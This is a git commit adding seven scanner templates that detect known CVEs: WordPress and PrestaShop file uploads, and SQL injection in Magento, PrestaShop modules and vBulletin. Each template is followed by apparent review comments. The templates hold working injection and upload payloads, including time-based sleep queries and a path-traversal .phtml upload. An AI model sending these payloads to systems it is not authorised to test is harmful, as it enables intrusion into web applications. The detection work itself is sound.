Fixes and 2023 CVEs

patch-1
mastercho 2024-03-16 19:23:48 +02:00
parent a7257fdadc
commit b32a1f9d7f
7 changed files with 300 additions and 0 deletions


@ -0,0 +1,57 @@
id: CVE-2015-4455
info:
name: CVE-2015-4455
author: MaStErChO
severity: critical
description: |
Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-4455
- http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html
metadata:
framework: wordpress
variables:
filename: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
GET /?gf_page=upload HTTP/1.1
Host: {{Hostname}}
- |
POST /?gf_page=upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="field_id"
3
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="form_id"
1
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="gform_unique_id"
../../../
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="name"
{(unknown)}.phtml
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="file"; filename="{(unknown)}.jpg"
Content-Type: text/html
{{randstr}}
--a54906fe12c504cb01ca836d062f82fa--
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Failed to upload file")'
- 'status_code_2 == 200'
- 'contains(body_2, "uploaded_filename\":\"{(unknown)}.jpg")'
condition: and
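Review bot: This template writes a file to the target (the multipart POST uploads `{{randstr}}` under a `.phtml` `name` with a `../../../` `gform_unique_id`), yet it has no `tags:` line at all, so it is missing the `intrusive` tag that the cartabandonmentpro template in this same commit carries; add at minimum `tags: intrusive,file-upload,wordpress,...` so default scans exclude it, and add `max-request: 2` under `metadata` as the other CVE templates do. Also `variables.filename` is declared but the visible `name`, `filename=` and third matcher lines reference `{(unknown)}` instead of `{{filename}}`; confirm the checked-in file uses `{{filename}}` consistently, because `contains(body_2, "uploaded_filename\":\"...jpg")` only fires when the echoed name matches what was sent. A `matchers-condition` is not needed with a single dsl matcher, but a note in `info` that the uploaded file is not removed would help operators.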


@ -0,0 +1,53 @@
id: CVE-2019-7139
info:
name: CVE-2019-7139
author: MaStErChO
severity: high
description: |
The Magento application running on the remote web server is affected by a SQL injection vulnerability due to failing to properly sanitize the user-supplied from and to inputs to the prepareSqlCondition function of the Magento\Framework\DB\Adapter\Pdo\Mysql class. An unauthenticated, remote attacker can exploit this to execute arbitrary SQL statements against the back-end database, leading to the execution of arbitrary code, manipulation of data, or disclosure of sensitive information
reference:
- https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
- https://www.ambionics.io/blog/magento-sqli
metadata:
framework: magento
tags: sqli,magento
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
name: Blind
dsl:
- 'contains(body_1, "text/x-magento-init")'
- 'status_code_2 == 200'
- 'status_code_3 == 400'
- 'contains(content_type_2, "application/json")'
- 'contains(content_type_3, "application/json")'
- 'len(body_2) == 2'
- 'len(body_3) == 2'
condition: and
- type: dsl
name: Time
dsl:
- 'contains(body_1, "text/x-magento-init")'
- 'duration_4>=6'
- 'contains(content_type_4, "application/json")'
- 'len(body_4) == 2'
condition: and
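Review bot: The `Time` matcher accepts any response slower than six seconds (`duration_4>=6`) with no baseline request, and because `matchers-condition: or` lets it fire alone, an overloaded Magento host is reported vulnerable even when the query is unaffected; prefer the `Blind` matcher's 200/400 contrast between requests 2 and 3, which is the reliable signal here, and either drop the time-based branch or make it secondary. Also `metadata` lacks `max-request: 4` (set in the other CVE templates of this commit), the description is missing its final period, and `reference` has no NVD entry for CVE-2019-7139 while the CVE-2015-4455 template lists one.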


@ -0,0 +1,36 @@
id: CVE-2023-27032
info:
name: CVE-2023-27032
author: MaStErChO
severity: critical
description: |
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
metadata:
max-request: 1
framework: prestashop
shodan-query: http.component:"prestashop"
tags: sqli,prestashop,advancedpopupcreator
http:
- raw:
- |
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time=1709941392995&token=1946dc43bb8d7cb5fef89588e87479d8
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: status
status:
- 200
- type: word
part: body
words:
- "popups"
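Review bot: The request body hard-codes `time=1709941392995` and `token=1946dc43bb8d7cb5fef89588e87479d8`, values captured from one installation; if the module validates the token, the template silently fails everywhere else, so either confirm the endpoint ignores them or generate `time` with a DSL helper and document where `token` comes from. The only injection evidence is `duration>=6` with no control request, so a slow host matches on its own; the `200` status and `popups` word checks only prove the endpoint answered, not that the `sleep(6)` branch ran.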


@ -0,0 +1,32 @@
id: CVE-2023-45375
info:
name: CVE-2023-45375
author: MaStErChO
severity: high
description: |
In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
metadata:
max-request: 1
framework: prestashop
shodan-query: http.component:"prestashop"
tags: sqli,prestashop,pireospay
http:
- raw:
- |
POST /module/pireospay/validation HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: status
status:
- 302
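Review bot: The `status: 302` matcher is ANDed with the timing check, so a vulnerable shop whose `/module/pireospay/validation` answers with 200 instead of redirecting is reported clean; the redirect belongs to the payment flow rather than to the injection, so either drop that matcher or list `200` alongside `302`. As with the other time-based templates in this commit, `duration>=6` is the sole signal and has no baseline request to compare against.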


@ -0,0 +1,32 @@
id: CVE-2023-46347
info:
name: CVE-2023-46347
author: MaStErChO
severity: high
description: |
In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html
- https://stack.chaitin.com/poc/detail/3977
metadata:
max-request: 1
framework: prestashop
shodan-query: http.component:"prestashop"
tags: sqli,prestashop,ndk_steppingpack
http:
- raw:
- |
POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: status
status:
- 200
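Review bot: This uses the same hex-encoded `select ... into @a; prepare b from @a; execute b` pattern as the CVE-2023-45375 template with `duration>=6` as the only injection evidence; sending a first request to `/modules/ndk_steppingpack/search-result.php` without the injected `search_query` and asserting on the difference between the two durations would cut false positives from slow hosts. Minor: the description says "up to 1.5.6" while the PireosPay template says "up to version 1.7.9"; use one phrasing across the commit.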


@ -0,0 +1,53 @@
id: prestashop-cartabandonmentpro-file-upload
info:
name: Prestashop Cart Abandonment Pro File Upload
author: MaStErChO
severity: critical
reference:
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
- https://dh42.com/blog/prestashop-security/
metadata:
framework: prestashop
shodan-query: http.component:"prestashop"
tags: intrusive,file-upload,cartabandonmentpro,prestashop
variables:
filename: '{{rand_base(7, "abc")}}'
title: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
POST /modules/{{paths}}/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=xYzZY
--xYzZY
Content-Disposition: form-data; name="image"; filename="{(unknown)}.php.png"
Content-Type: image/png
<html>
<!-- {{title}} -->
</html>
--xYzZY--
payloads:
paths:
- 'cartabandonmentpro'
- 'cartabandonmentproOld'
stop-at-first-match: true
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
words:
- "{(unknown)}.php.png"
part: body
- type: dsl
dsl:
- status_code == 200
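Review bot: This template has no `description` block (every other file in this commit has one) and no `max-request: 2` under `metadata` for the two `paths` payloads; add both. The filename matcher uses `{(unknown)}.php.png` where `{{filename}}` is expected, so confirm the checked-in file references the declared `filename` variable, and note that `title` is only used as an HTML comment marker inside the upload. The `intrusive` tag is correctly set since the request writes a `.php.png` file to the target; a line in `info` saying the upload is not removed would help operators, and the `status_code == 200` dsl matcher could simply be a `status` matcher like the other templates use.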


@ -0,0 +1,37 @@
id: vbulletin-search-sqli
info:
name: vBulletin Search.php SQL Injection
author: MaStErChO
severity: high
description: |
vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server.
reference:
- https://www.exploit-db.com/exploits/17314
- https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/
tags: vbulletin, ajaxreg, sql-injection
metadata:
max-request: 1
shodan-query: http.component:"vBulletin"
http:
- raw:
- |
POST /search.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
matchers-condition: and
matchers:
- type: word
part: body
words:
- "type=dberror"
- type: status
status:
- 200
- 503
condition: or
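Review bot: The tag `ajaxreg` does not fit this template, which targets `search.php` with `contenttypeid=7&do=process`; replace it with `sqli` or drop it, and remove the spaces in `tags: vbulletin, ajaxreg, sql-injection` to match the comma-only style of the other templates. The description's "which may allow an attacker can execute malicious SQL statements" needs rewording (for example "which may allow an attacker to execute malicious SQL statements"), and `metadata` lacks the `framework:` entry the other templates carry. The body match on `type=dberror` is the real signal; the `200`/`503` status matcher adds little and could be dropped.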